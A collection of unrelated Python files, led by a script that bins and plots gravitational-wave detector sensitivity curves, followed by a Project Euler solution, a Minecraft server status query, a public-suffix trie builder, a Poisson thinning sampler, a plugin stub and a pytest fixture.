eff_DECIGO = 1.
DECIGO_T_obs = 10 * year_sec * eff_DECIGO
# DO Optimal
DO = np.load(op.join(op.dirname(__file__),'files/S_h_DO_Optimal.npz'))
DO_freq = DO['x']
DO_strain = DO['y']
eff_DO = 0.75
DO_T_obs = 4 * year_sec * eff_DO
# DO Conservative
DO_cons = np.load(op.join(op.dirname(__file__),'files/S_h_DO_Conservative.npz'))
DO_cons_freq = DO_cons['x']
DO_cons_strain = DO_cons['y']
eff_DO = 0.75
DO_cons_T_obs = 4 * year_sec * eff_DO
# AEDGE
AEDGE = np.load(op.join(op.dirname(__file__),'files/S_h_AEDGE.npz'))
AEDGE_freq = AEDGE['x']
AEDGE_strain = AEDGE['y']
eff_AEDGE = 0.6
AEDGE_T_obs = 5 * year_sec * eff_AEDGE
###############################################################################
# Generate primordial signals and wavenumber vector
class_axion1 = Signal_GW(r_vac=1e-5, r_star=835, k_p=1e13, sigma=9, axion=True)
class_axion2 = Signal_GW(r_vac=1e-5, r_star=0.15 , k_p=1e11, sigma=8, axion=True)
class_no_axion = Signal_GW(r_vac=0.01, axion=None)
class_no_axion_r0001 = Signal_GW(r_vac=0.001, axion=None)
# Wavenumber array
k = np.logspace(np.log10(1e-5), np.log10(1e20), 100000)
###############################################################################
#class for SKA
sens_curve_SKA = np.array(SKA_strain)
omega_gw = class_axion1.analytic_omega_WK(k)
k_SKA = np.array(SKA_freq) * 6.5e14
class_binned_SKA = Binned_GW(
name_exp='SKA',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_SKA,
omega_gw=omega_gw,
k_sens=k_SKA,
kmin_sens=k_SKA[0],
N_bins_sens=5,
T_obs=SKA_T_obs,
n_det=1.,
sigma_L=1.0,
)
xerr_SKA, yerr_SKA, bins_mean_point_SKA, binned_signal_SKA, binned_curve_SKA = class_binned_SKA.sens_curve_binning()
###############################################################################
#class for AEDGE
sens_curve_AEDGE = np.array(AEDGE_strain)
omega_gw = class_axion1.analytic_omega_WK(k)
k_AEDGE = np.array(AEDGE_freq) * 6.5e14
class_binned_AEDGE = Binned_GW(name_exp='AEDGE',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_AEDGE,
omega_gw=omega_gw,
k_sens=k_AEDGE,
kmin_sens=k_AEDGE[0],
N_bins_sens=4,
T_obs=AEDGE_T_obs,
n_det = 1.,
interp=True,
sigma_L=1.0,
)
xerr_AEDGE, yerr_AEDGE, bins_mean_point_AEDGE, binned_signal_AEDGE, binned_curve_AEDGE = class_binned_AEDGE.sens_curve_binning()
###############################################################################
#class for ET
sens_curve_ET = np.array(ET_strain)
omega_gw = class_axion1.analytic_omega_WK(k)
k_ET = np.array(ET_freq) * 6.5e14
class_binned_ET = Binned_GW(name_exp='ET',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_ET,
omega_gw=omega_gw,
k_sens=k_ET,
kmin_sens=1.5*6.5e14 ,
N_bins_sens=5,
T_obs=ET_T_obs,
interp=True,
n_det = 3.,
sigma_L=1.0,
)
xerr_ET, yerr_ET, bins_mean_point_ET, binned_signal_ET, binned_curve_ET = class_binned_ET.sens_curve_binning()
###############################################################################
#class for aLIGO
sens_curve_aLIGO = np.array(aLIGO_strain)
omega_gw = class_axion1.analytic_omega_WK(k)
k_aLIGO = np.array(aLIGO_freq) * 6.5e14
class_binned_aLIGO = Binned_GW(name_exp='Adv_LIGO',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_aLIGO,
omega_gw=omega_gw,
k_sens=k_aLIGO,
kmin_sens=k_aLIGO[0],
N_bins_sens=5,
T_obs=aLIGO_T_obs,
n_det = 1.,
sigma_L=1.,
)
xerr_aLIGO, yerr_aLIGO, bins_mean_point_aLIGO, binned_signal_aLIGO, binned_curve_aLIGO = class_binned_aLIGO.sens_curve_binning()
###############################################################################
#class for LISA
sens_curve_LISA = np.array(LISA_xcosmo_strain)
omega_gw = class_axion1.analytic_omega_WK(k)
k_LISA = np.array(LISA_xcosmo_freq) * 6.5e14
class_binned = Binned_GW(name_exp='LISA',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_LISA,
omega_gw=omega_gw,
k_sens=k_LISA,
kmin_sens=1.21303790e+10,
N_bins_sens=8,
T_obs=LISA_xcosmo_T_obs,
n_det = 1.,
interp=True,
sigma_L=1.0,
)
binned_signal_whole, bins_mean_point_whole = class_binned.Omega_GW_binning()
xerr, yerr, bins_mean_point, binned_signal, binned_curve = class_binned.sens_curve_binning()
################################################################################
# BBO
omega_gw_axion2 = class_axion2.analytic_omega_WK(k)
k_BBO = np.array(BBO_STAR_freq) * 6.5e14
sens_curve_BBO = np.array(BBO_STAR_strain)
class_BBO = Binned_GW(name_exp='BBO',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_BBO,
omega_gw=omega_gw_axion2,
k_sens=k_BBO,
kmin_sens=k_BBO[0],
N_bins_sens=12,
T_obs=BBO_STAR_T_obs,
n_det = 2.,
interp=True,
sigma_L=1.0,
)
binned_signal_axion2, bins_mean_point_axion2 = class_BBO.Omega_GW_binning()
xerr_BBO, yerr_BBO, bins_mean_point_BBO, binned_signal_BBO, binned_curve_BBO = class_BBO.sens_curve_binning()
###############################################################################
#class for LiteBIRD and r=0
Fisher = np.load(op.join(op.dirname(__file__),'files/LiteBIRD_Fisher_matrices/Fisher_1.3_r0.npy'))
omega_gw_flat_r0001 = class_no_axion_r0001.analytic_omega_WK(k)
power_spectrum_r0001 = class_no_axion_r0001.tensor_spect(k)
class_binned_flat_CMB_0001 = Binned_GW(name_exp='LiteBIRD',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
omega_gw=omega_gw_flat_r0001,
kmin_sens=1e-4,
N_bins_sens=7,
CMB=True,
F=Fisher,
tensor_spect=power_spectrum_r0001,
sigma_L=1.0,
)
xerr_flat_0001, yerr_flat_0001, bins_mean_point_flat_0001, binned_signal_flat_0001, binned_curve_flat_0001 = class_binned_flat_CMB_0001.sens_curve_binning()
################################################################################
#class for DECIGO
sens_curve_DECIGO = np.array(DECIGO_strain)
k_decigo = class_axion1.freq_k_conv(DECIGO_freq)
class_DECIGO = Binned_GW(name_exp='DECIGO',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_DECIGO,
omega_gw=omega_gw_axion2,
k_sens=k_decigo,
kmin_sens=k_decigo[0],
N_bins_sens=11,
T_obs = DECIGO_T_obs,
interp=True,
n_det = 2.,
sigma_L=1.0,
)
xerr_decigo, yerr_decigo, bins_mean_point_decigo, binned_signal_decigo, binned_curve_decigo = class_DECIGO.sens_curve_binning()
################################################################################
#class for muAres without foregrounds
sens_curve_MUARES_nofgs = np.array(Ares_nofgs_strain)
k_muares_nofgs = class_axion1.freq_k_conv(Ares_nofgs_freq)
class_MUARES_nofgs = Binned_GW(name_exp='muAres',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_MUARES_nofgs,
omega_gw=omega_gw,
k_sens=k_muares_nofgs,
kmin_sens=k_muares_nofgs[0],
N_bins_sens=12,
T_obs=Ares_nofgs_T_obs,
interp=True,
n_det = 2.,
sigma_L=1.0,
)
xerr_muares_nofgs, yerr_muares_nofgs, bins_mean_point_muares_nofgs, binned_signal_muares_nofgs, binned_curve_muares_nofgs = class_MUARES_nofgs.sens_curve_binning()
###############################################################################
#class for DO Optimal
sens_curve_DO = np.array(DO_strain)
k_DO = class_axion1.freq_k_conv(DO_freq)
class_DO = Binned_GW(name_exp='DO_Opt',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_DO,
omega_gw=omega_gw,
k_sens=k_DO,
kmin_sens=k_DO[0],
N_bins_sens=7,
T_obs=DO_T_obs,
interp=True,
n_det = 1.,
sigma_L=1.0,
)
xerr_DO, yerr_DO, bins_mean_point_DO, binned_signal_DO, binned_curve_DO = class_DO.sens_curve_binning()
###############################################################################
#class for DO Conservative
sens_curve_DO_cons = np.array(DO_cons_strain)
k_DO_cons = class_axion1.freq_k_conv(DO_cons_freq)
class_DO_cons = Binned_GW(name_exp='DO_Cons',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_DO_cons,
omega_gw=omega_gw,
k_sens=k_DO_cons,
kmin_sens=k_DO_cons[0],
N_bins_sens=7,
T_obs=DO_cons_T_obs,
interp=True,
n_det = 1.,
sigma_L=1.0,
)
xerr_DO_cons, yerr_DO_cons, bins_mean_point_DO_cons, binned_signal_DO_cons, binned_curve_DO_cons = class_DO_cons.sens_curve_binning()
###############################################################################
###############################################################################
########## FOREGROUNDS BELOW!! ###########
###############################################################################
###############################################################################
#class for SKA for fgs
class_binned_SKA_fgs = Binned_GW(name_exp='SKA_with_fgs',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_SKA,
omega_gw=omega_gw,
k_sens=k_SKA,
kmin_sens=k_SKA[0],
N_bins_sens=5,
T_obs=SKA_T_obs,
n_det=1.,
fgs=True,
sigma_L=1.0,
)
xerr_SKA_fgs, yerr_SKA_fgs, bins_mean_point_SKA_fgs, binned_signal_SKA_fgs, binned_curve_SKA_fgs = class_binned_SKA_fgs.sens_curve_binning()
###############################################################################
# Class for ET with fgs
class_binned_ET_fgs = Binned_GW(name_exp='ET_with_fgs',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_ET,
omega_gw=omega_gw,
k_sens=k_ET,
kmin_sens=1.5*6.5e14 ,
N_bins_sens=5,
T_obs=ET_T_obs,
n_det = 3.,
fgs=True,
interp=True,
sigma_L=1.0,
)
xerr_ET_fgs, yerr_ET_fgs, bins_mean_point_ET_fgs, binned_signal_ET_fgs, binned_curve_ET_fgs = class_binned_ET_fgs.sens_curve_binning()
###############################################################################
#class for AEDGE with fgs
class_binned_AEDGE_fgs = Binned_GW(name_exp='AEDGE_with_fgs',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_AEDGE,
omega_gw=omega_gw,
k_sens=k_AEDGE,
kmin_sens=k_AEDGE[0],
N_bins_sens=4,
T_obs=AEDGE_T_obs,
n_det = 1.,
interp=True,
fgs=True,
sigma_L=0.1,
)
xerr_AEDGE_fgs, yerr_AEDGE_fgs, bins_mean_point_AEDGE_fgs, binned_signal_AEDGE_fgs, binned_curve_AEDGE_fgs = class_binned_AEDGE_fgs.sens_curve_binning()
###############################################################################
#class for LISA with fgs
class_binned_fgs = Binned_GW(name_exp='LISA_with_fgs',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_LISA,
omega_gw=omega_gw,
k_sens=k_LISA,
kmin_sens=1.21303790e+10,
N_bins_sens=8,
T_obs=LISA_xcosmo_T_obs,
n_det = 1.,
interp=True,
fgs=True,
sigma_L=0.1,
)
xerr_fgs, yerr_fgs, bins_mean_point_fgs, binned_signal_fgs, binned_curve_fgs = class_binned_fgs.sens_curve_binning()
################################################################################
#class for DECIGO with fgs
class_DECIGO_fgs = Binned_GW(name_exp='DECIGO_with_fgs',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_DECIGO,
omega_gw=omega_gw_axion2,
k_sens=k_decigo,
kmin_sens=k_decigo[0],
N_bins_sens=11,
T_obs = DECIGO_T_obs,
interp=True,
n_det = 2.,
fgs=True,
sigma_L=1e-3,
)
xerr_decigo_fgs, yerr_decigo_fgs, bins_mean_point_decigo_fgs, binned_signal_decigo_fgs, binned_curve_decigo_fgs = class_DECIGO_fgs.sens_curve_binning()
##############################################################################
#class for DECIGO only spectral shape
class_DECIGO_spectral = Binned_GW(name_exp='DECIGO_spectral_shape',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_DECIGO,
omega_gw=omega_gw_axion2,
k_sens=k_decigo,
kmin_sens=k_decigo[0],
N_bins_sens=11,
T_obs = DECIGO_T_obs,
interp=True,
n_det = 2.,
fgs=True,
sigma_L=1.0,
)
xerr_decigo_spectral, yerr_decigo_spectral, bins_mean_point_decigo_spectral, binned_signal_decigo_spectral, binned_curve_decigo_spectral = class_DECIGO_spectral.sens_curve_binning()
###############################################################################
#class for DO Optimal with fgs
class_DO_fgs = Binned_GW(name_exp='DO_Optimal_with_fgs',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_DO,
omega_gw=omega_gw,
k_sens=k_DO,
kmin_sens=k_DO[0],
N_bins_sens=7,
T_obs=DO_T_obs,
interp=True,
n_det = 1.,
fgs=True,
sigma_L=0.1,
)
xerr_DO_fgs, yerr_DO_fgs, bins_mean_point_DO_fgs, binned_signal_DO_fgs, binned_curve_DO_fgs = class_DO_fgs.sens_curve_binning()
###############################################################################
#class for DO Conservative with fgs
class_DO_cons_fgs = Binned_GW(name_exp='DO_Cons_withfgs',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_DO_cons,
omega_gw=omega_gw,
k_sens=k_DO_cons,
kmin_sens=k_DO_cons[0],
N_bins_sens=7,
T_obs=DO_cons_T_obs,
interp=True,
n_det = 1.,
fgs=True,
sigma_L=0.1,
)
xerr_DO_cons_fgs, yerr_DO_cons_fgs, bins_mean_point_DO_cons_fgs, binned_signal_DO_cons_fgs, binned_curve_DO_cons_fgs = class_DO_cons_fgs.sens_curve_binning()
###############################################################################
# class for muAres with foregrounds
class_MUARES = Binned_GW(name_exp='muAres_two_fgs_spectral',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_MUARES_nofgs,
omega_gw=omega_gw,
k_sens=k_muares_nofgs,
kmin_sens=k_muares_nofgs[0],
N_bins_sens=12,
T_obs=Ares_nofgs_T_obs,
interp=True,
n_det = 2.,
sigma_L=1e-3,
fgs=True,
)
xerr_muares, yerr_muares, bins_mean_point_muares, binned_signal_muares, binned_curve_muares = class_MUARES.sens_curve_binning()
###############################################################################
# Plot
fig = plt.figure()
ax = plt.gca()
ax.loglog(np.array(bins_mean_point_BBO)/6.5e14, binned_curve_BBO[:len(bins_mean_point_BBO)], linewidth='1.5', color=sns.xkcd_rgb["dusty purple"], linestyle='--')
ax.loglog(np.array(bins_mean_point_decigo)/6.5e14, binned_curve_decigo[:len(bins_mean_point_decigo)], linewidth='1.5', color=sns.xkcd_rgb["amber"], linestyle='--')
ax.loglog(np.array(bins_mean_point_aLIGO)/6.5e14, binned_curve_aLIGO[:len(bins_mean_point_aLIGO)], label='aLIGO', linewidth='1.5', color=sns.xkcd_rgb["yellow"], linestyle='--')
ax.loglog(np.array(bins_mean_point_DO)/6.5e14, binned_curve_DO[:len(bins_mean_point_DO)], linewidth='1.5', color=sns.xkcd_rgb["greyish"], linestyle='--')
ax.loglog(np.array(bins_mean_point_DO_cons)/6.5e14, binned_curve_DO_cons[:len(bins_mean_point_DO_cons)], linewidth='1.5', color=sns.xkcd_rgb["faded green"], linestyle='--')
ax.loglog(np.array(bins_mean_point_ET)/6.5e14, binned_curve_ET[:len(bins_mean_point_ET)], linewidth='1.5', color=sns.xkcd_rgb["steel blue"], linestyle='--')
ax.loglog(np.array(bins_mean_point_muares_nofgs)/6.5e14, binned_curve_muares_nofgs[:len(bins_mean_point_muares_nofgs)], linewidth='1.5', color=sns.xkcd_rgb["cyan"], linestyle='--')
ax.loglog(np.array(bins_mean_point)/6.5e14, binned_curve[:len(bins_mean_point)], linewidth='1.5', color=sns.xkcd_rgb["black"], linestyle='--')
ax.loglog(np.array(bins_mean_point_flat_0001)/6.5e14, binned_curve_flat_0001[:len(bins_mean_point_flat_0001)], label='LiteBIRD r=0', linewidth='1.5', color=sns.xkcd_rgb["scarlet"], linestyle='-')
ax.loglog(np.array(bins_mean_point_AEDGE)/6.5e14, binned_curve_AEDGE[:len(bins_mean_point_AEDGE)], linewidth='1.5', color=sns.xkcd_rgb["pale red"], linestyle='--')
ax.loglog(np.array(bins_mean_point_SKA)/6.5e14, binned_curve_SKA[:len(bins_mean_point_SKA)], linewidth='1.5', color=sns.xkcd_rgb["violet"], linestyle='--')
ax.loglog(np.array(bins_mean_point_decigo_fgs)/6.5e14, binned_curve_decigo_fgs[:len(bins_mean_point_decigo_fgs)], label='DECIGO', linestyle='-', linewidth='1.5', color=sns.xkcd_rgb["amber"])
ax.loglog(np.array(bins_mean_point_decigo_spectral)/6.5e14, binned_curve_decigo_spectral[:len(bins_mean_point_decigo_spectral)], linestyle='-.', linewidth='1.5', color=sns.xkcd_rgb["amber"])
ax.loglog(np.array(bins_mean_point_DO_fgs)/6.5e14, binned_curve_DO_fgs[:len(bins_mean_point_DO_fgs)], label='DO Optimal', linestyle='-', linewidth='1.5', color=sns.xkcd_rgb["greyish"])
ax.loglog(np.array(bins_mean_point_DO_cons_fgs)/6.5e14, binned_curve_DO_cons_fgs[:len(bins_mean_point_DO_cons_fgs)],label='DO Conservative', linestyle='-', linewidth='1.5', color=sns.xkcd_rgb["faded green"])
ax.loglog(np.array(bins_mean_point_muares)/6.5e14, binned_curve_muares[:len(bins_mean_point_muares)], label=r'$\mu$Ares', linestyle='-', linewidth='1.5', color=sns.xkcd_rgb["cyan"])
ax.loglog(np.array(bins_mean_point_fgs)/6.5e14, binned_curve_fgs[:len(bins_mean_point_fgs)], label='LISA', linestyle='-', linewidth='1.5', color=sns.xkcd_rgb["black"])
ax.loglog(np.array(bins_mean_point_AEDGE_fgs)/6.5e14, binned_curve_AEDGE_fgs[:len(bins_mean_point_AEDGE_fgs)], label='AEDGE', linestyle='-', linewidth='1.5', color=sns.xkcd_rgb["pale red"])
ax.loglog(np.array(bins_mean_point_ET_fgs)/6.5e14, binned_curve_ET_fgs[:len(bins_mean_point_ET_fgs)], label='ET', linewidth='1.5', linestyle='-', color=sns.xkcd_rgb["steel blue"])
ax.loglog(np.array(bins_mean_point_SKA_fgs)/6.5e14, binned_curve_SKA_fgs[:len(bins_mean_point_SKA_fgs)], label='SKA', linewidth='1.5', linestyle='-', color=sns.xkcd_rgb["violet"])
ax.set_xlim([1e-19, 1e4])
ax.set_ylim([1e-19, 1e-6])
plt.xlabel(r'f $[Hz]$',fontsize = 10.0)
plt.ylabel(r'$h^{2} \Omega_{GW}$',fontsize = 10.0)
plt.tick_params(axis = 'both',which = 'major', labelsize = 10.0)
ax.legend(fontsize=8, bbox_to_anchor=(1, 1.0))
plt.savefig(op.join(op.dirname(__file__),'figures/Fig_8.pdf'), format='pdf', dpi=1000, bbox_inches='tight')
plt.show()
# saving binned Omega_gw h^2 curves as a function of frequency to .npz files
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_DECIGO_nofgs.npz'), x=np.array(bins_mean_point_decigo)/6.5e14, y=binned_curve_decigo[:len(bins_mean_point_decigo)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_DECIGO_fgs.npz'), x=np.array(bins_mean_point_decigo_fgs)/6.5e14, y=binned_curve_decigo_fgs[:len(bins_mean_point_decigo_fgs)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_DECIGO_spectral.npz'), x=np.array(bins_mean_point_decigo_spectral)/6.5e14, y=binned_curve_decigo_spectral[:len(bins_mean_point_decigo_spectral)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_LISA_nofgs.npz'), x=np.array(bins_mean_point)/6.5e14, y=binned_curve[:len(bins_mean_point_decigo)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_LISA_fgs.npz'), x=np.array(bins_mean_point_fgs)/6.5e14, y=binned_curve_fgs[:len(bins_mean_point_fgs)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_BBO_nofgs.npz'), x=np.array(bins_mean_point_BBO)/6.5e14, y=binned_curve_BBO[:len(bins_mean_point_BBO)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_DO_Optimal_nofgs.npz'), x=np.array(bins_mean_point_DO)/6.5e14, y=binned_curve_DO[:len(bins_mean_point_DO)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_DO_Optimal_fgs.npz'), x=np.array(bins_mean_point_DO_fgs)/6.5e14, y=binned_curve_DO_fgs[:len(bins_mean_point_DO_fgs)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_DO_Conservative_nofgs.npz'), x=np.array(bins_mean_point_DO_cons)/6.5e14, y=binned_curve_DO_cons[:len(bins_mean_point_DO_cons)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_DO_Conservative_fgs.npz'), x=np.array(bins_mean_point_DO_cons_fgs)/6.5e14, y=binned_curve_DO_cons_fgs[:len(bins_mean_point_DO_cons_fgs)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_AEDGE_nofgs.npz'), x=np.array(bins_mean_point_AEDGE)/6.5e14, y=binned_curve_AEDGE[:len(bins_mean_point_AEDGE)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_AEDGE_fgs.npz'), x=np.array(bins_mean_point_AEDGE_fgs)/6.5e14, y=binned_curve_AEDGE_fgs[:len(bins_mean_point_AEDGE_fgs)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_muAres_nofgs.npz'), x=np.array(bins_mean_point_muares_nofgs)/6.5e14, y=binned_curve_muares_nofgs[:len(bins_mean_point_muares_nofgs)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_muAres_fgs.npz'), x=np.array(bins_mean_point_muares)/6.5e14, y=binned_curve_muares[:len(bins_mean_point_muares)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_SKA_nofgs.npz'), x=np.array(bins_mean_point_SKA)/6.5e14, y=binned_curve_SKA[:len(bins_mean_point_SKA)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_SKA_fgs.npz'), x=np.array(bins_mean_point_SKA_fgs)/6.5e14, y=binned_curve_SKA_fgs[:len(bins_mean_point_SKA_fgs)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_ET_nofgs.npz'), x=np.array(bins_mean_point_ET)/6.5e14, y=binned_curve_ET[:len(bins_mean_point_ET)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_ET_fgs.npz'), x=np.array(bins_mean_point_ET_fgs)/6.5e14, y=binned_curve_ET_fgs[:len(bins_mean_point_ET_fgs)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_LiteBIRD_fgs.npz'), x=np.array(bins_mean_point_flat_0001)/6.5e14, y=binned_curve_flat_0001[:len(bins_mean_point_flat_0001)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_aLIGO.npz'), x=np.array(bins_mean_point_aLIGO)/6.5e14, y=binned_curve_aLIGO[:len(bins_mean_point_aLIGO)])
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# A Solution to "Smallest multiple" – Project Euler Problem No. 5
# by Florian Buetow
#
# Sourcecode: https://github.com/fbcom/project-euler
# Problem statement: https://projecteuler.net/problem=5
#
def calc_smallest_multiple(numbers):
factors = []
for n in range(2, numbers+1):
new_f = n
for f in factors:
if new_f % f == 0:
new_f = new_f / f
if new_f > 1:
factors.append(new_f)
return reduce(lambda product, factor: product * factor, factors)
assert (2520 == calc_smallest_multiple(10)), "Testcase failed."
print "Solution:", calc_smallest_multiple(20)
|
"""
Some old, example code
"""
from mcstatus import MinecraftServer
import click
from json import dumps as json_dumps
# If you know the host and port, you may skip this and use MinecraftServer("example.org", 1234)
server = MinecraftServer.lookup("example.com")
# 'status' is supported by all Minecraft servers that are version 1.7 or higher.
status = server.status()
print("The server has {0} players and replied in {1} ms".format(status.players.online, status.latency))
# 'ping' is supported by all Minecraft servers that are version 1.7 or higher.
# It is included in a 'status' call, but is exposed separate if you do not require the additional info.
latency = server.ping()
print("The server replied in {0} ms".format(latency))
# 'query' has to be enabled in a servers' server.properties file.
# It may give more information than a ping, such as a full player list or mod information.
# from mcstatus.scripts.mcstatus import cli, json
# cli("ucsd.pocketmc.net")
data = {'online': False}
# Build data with responses and quit on exception
try:
ping_res = server.ping()
data['online'] = True
data['ping'] = ping_res
# status_res = server.status(retries=1)
status_res = status
data['version'] = status_res.version.name
data['protocol'] = status_res.version.protocol
data['motd'] = status_res.description
data['player_count'] = status_res.players.online
data['player_max'] = status_res.players.max
data['players'] = []
if status_res.players.sample is not None:
data['players'] = [{'name': player.name, 'id': player.id} for player in status_res.players.sample]
query_res = server.query(retries=1)
data['host_ip'] = query_res.raw['hostip']
data['host_port'] = query_res.raw['hostport']
data['map'] = query_res.map
data['plugins'] = query_res.software.plugins
except:
pass
click.echo(json_dumps(data))
# query = json()
# print(query)
|
from schematics.types import StringType, EmailType
from schematics.models import Model
from .utils import BaseObject, BoolIntType
class Recipient(BaseObject):
validate_on_change = False
def __init__(self, name=None, email=None, **kwargs):
kwargs['name'] = name
kwargs['email'] = email
kwargs = self.clear_kwargs(kwargs)
self.__dict__['_model'] = RecipientModel(kwargs, strict=False)
if name and email:
self._model.validate()
class RecipientModel(Model):
name = StringType(required=True)
email = EmailType(required=True)
role = StringType()
message = StringType()
required = BoolIntType()
class Options:
serialize_when_none = False
|
import os
import requests
import pygtrie as trie
from joblib import dump
from config import PUBLIC_SUFFIX_LIST_URL, SUFFIX_TRIE, DATA_DIR
def fetch_public_suffix_data():
data = []
try:
r = requests.get(PUBLIC_SUFFIX_LIST_URL, stream=True)
data = r.text.split("\n")
except Exception as e:
print("EXCEPTION IN FETCHING PUBLIC SUFFIX LIST : " + str(e))
return data
def create_public_suffix_trie():
pub_suf_trie = trie.StringTrie()
data = fetch_public_suffix_data()
if len(data) > 0:
for ps in data:
if ps != "" and not ps.startswith("//"):
pub_suf_trie[ps] = True
return pub_suf_trie
def dump_suffix_trie():
pub_suf_trie = create_public_suffix_trie()
try:
dump(pub_suf_trie, os.path.join(DATA_DIR, SUFFIX_TRIE))
except Exception as e:
print(e)
if __name__ == "__main__":
dump_suffix_trie()
|
import numpy as np
def thinning_T(start, intensity, lambda_max, T):
n = 0
indicators = []
sample = []
next_arrival_time = start
while True:
next_arrival_time += np.random.exponential(scale=1.0 / lambda_max)
if next_arrival_time < T:
n += 1
d = np.random.rand()
lambda_s = intensity(next_arrival_time)
sample.append(next_arrival_time)
if d <= lambda_s / lambda_max:
indicators.append(True)
# n += 1
else:
indicators.append(False)
else:
break
return np.array(sample)[indicators]
|
from taichi.core import tc_core as core
from taichi.dynamics import *
from taichi.geometry import *
from taichi.misc.util import Vector, Vectori
from taichi.scoping import *
from taichi.tools import *
from taichi.visual import *
from taichi.misc import *
from taichi.misc.task import Task
from taichi.misc import settings as settings
from taichi.misc.settings import *
import taichi.image as image
from taichi.tools.video import VideoManager
from taichi.tools.transform import *
from taichi.tools.file import *
from taichi.visual.particle_renderer import *
from taichi.dynamics.smoke3 import *
from taichi.system import *
from taichi.pakua import get_pakua_server
from taichi.main import main
__all__ = [s for s in dir() if not s.startswith('_')] + ['settings']
|
from PyQt5.QtWidgets import QWidget
from StockAnalysisSystem.interface.interface import SasInterface as sasIF
# ----------------------------------------------------------------------------------------------------------------------
def plugin_prob() -> dict:
return {
'plugin_id': 'e4b259f1-9d6a-498a-b0de-ce7c83d9938d',
'plugin_name': 'Dummy',
'plugin_version': '0.0.0.1',
'tags': ['Dummy', 'Test', 'Example', 'Sleepy'],
}
def plugin_adapt(method: str) -> bool:
return method in ['widget']
def plugin_capacities() -> list:
return []
# return [
# 'period',
# 'thread',
# 'widget',
# ]
# ----------------------------------------------------------------------------------------------------------------------
sasInterface: sasIF = None
def init(sas_if: sasIF) -> bool:
"""
System will invoke this function at startup once.
:param sas_if: The instance of SasInterface (mot matter local or remote)
:return: True if successful else False
"""
try:
global sasInterface
sasInterface = sas_if
except Exception as e:
pass
finally:
pass
return True
def period(interval_ns: int):
"""
If you specify 'period' in plugin_capacities(). This function will be invoked periodically by MAIN thread,
the invoke interval should be more or less than 100ms.
Note that if this extension spends too much time on this function. The interface will be blocked.
And this extension will be removed from running list.
:param interval_ns: The interval between previous invoking and now.
:return: None
"""
print('Period...' + str(interval_ns))
pass
def thread(context: dict):
"""
If you specify 'thread' in plugin_capacities(). This function will be invoked in a thread.
If this function returns or has uncaught exception, the thread will be terminated and will not restart again.
:param context: The context from StockAnalysisSystem, includes:
'quit_flag': bool - Process should be terminated and quit this function if it's True.
'?????????': any - TBD
:return: None
"""
print('Thread...')
pass
def widget(parent: QWidget, **kwargs) -> (QWidget, dict):
"""
If you sepcify 'widget' in plugin_capacities(). This function will be invoked once at startup.
You should create and return a widget and it's config as a dict.
:param parent: The parent widget to create your widget.
:return: A tuple includes a QWidget and a dict.
QWidget: The widget you want to embed in the main widget.
dict : The widget config in a dict.
'name': str - The name of this widget. Will be used as the title of its entry.
'show': bool - Show at startup if True, else False
"""
print('Widget...')
return None
|
import pytest
from core.controller import TypeController
from tests.test_utils import hass_mock
from core.type.switch_controller import SwitchController
@pytest.fixture
@pytest.mark.asyncio
async def sut(hass_mock, mocker):
c = SwitchController()
mocker.patch.object(TypeController, "initialize")
c.args = {"switch": "switch.test"}
await c.initialize()
return c
